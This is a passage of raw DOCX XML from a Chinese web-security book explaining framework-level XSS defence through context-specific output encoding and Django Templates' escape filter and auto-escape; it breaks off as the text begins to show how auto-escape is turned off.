        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="224" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>首先，有些安全问题可以在框架中统一解决，能够大大节省程序员的工作量，节约人力成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>本。当代码的规模大到一定程度时，在业务的压力下，专门花时间去一个个修补漏洞几乎成为不可能完成的任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="197" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>其次，对于一些常见的漏洞来说，由程序员一个个修补可能会出现遗漏，而在框架中统一解决，有可能解决“遗漏”的问题。这需要制定相关的代码规范和工具配合。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="197" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>最后，在每个业务里修补安全漏洞，补丁的标准难以统一，而在框架中集中实施的安全方案，可以使所有基于框架开发的业务都能受益，从安全方案的有效性来说，更容易把握。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>模板引擎与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="301"/>
        <w:ind w:left="202" w:right="122" w:firstLine="401"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>层，可以解决 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>问题。在本书的“跨站脚本攻击”一章中，阐述了“输入检查” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>与“输出编码”这两种方法在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>防御效果上的差异。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击是在用户的浏览器上执行的， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>其形成过程则是在服务器端页面渲染时，注入了恶意的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>代码导致的。从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>架构来说， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>是发生在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层，因此使用“输出编码”的防御方法更加合理，这意味着需要针对不同上下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>文的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击场景，使用不同的编码方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在“跨站脚本攻击”一章中，我们将“输出编码”的防御方法总结为以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>标签中输出变量；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="911" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="910" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>属性中输出变量；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="910" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="909" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>标签中输出变量；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="910" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="909" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在事件中输出变量；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="910" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="909" w:right="0" w:hanging="311"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>中输出变量；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="910" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="909" w:right="0" w:hanging="312"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-26"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>中输出变量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="201" w:right="169" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>针对不同的情况，使用不同的编码函数。那么现在流行的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架是否符合这样的设计呢？答案是否定的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="602"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在当前流行的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层常用的技术是使用模板引擎对页面进行渲染，比如在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="202" w:right="221" w:hanging="101"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>“跨站脚本攻击”一章中所提到的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>，就使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django Templates </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>作为模板引擎。模板引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>擎本身，可能会提供一些编码方法，比如，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django Templates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>中，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>filters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>escape </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HtmlEncode </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;h1&gt;Hello, {{ name|escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>}}!&lt;/h1&gt;</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:53.679981pt;width:411.15pt;height:50.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4240;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt; is converted to &amp;lt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&gt; is converted to &amp;gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="4447" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>' (single quote) is converted to &amp;#39; " (double quote) is converted to &amp;quot; &amp; is converted to</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-6"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&amp;amp;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django Templates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>同时支持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，这符合 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Secure by Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>原则。现在的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django Templates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>，默认是将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>开启的，所有的变量都会经过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HtmlEncode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>后输出。默认是编</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>码了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个字符：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>如果要关闭 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，则需要使用以下方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="166"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
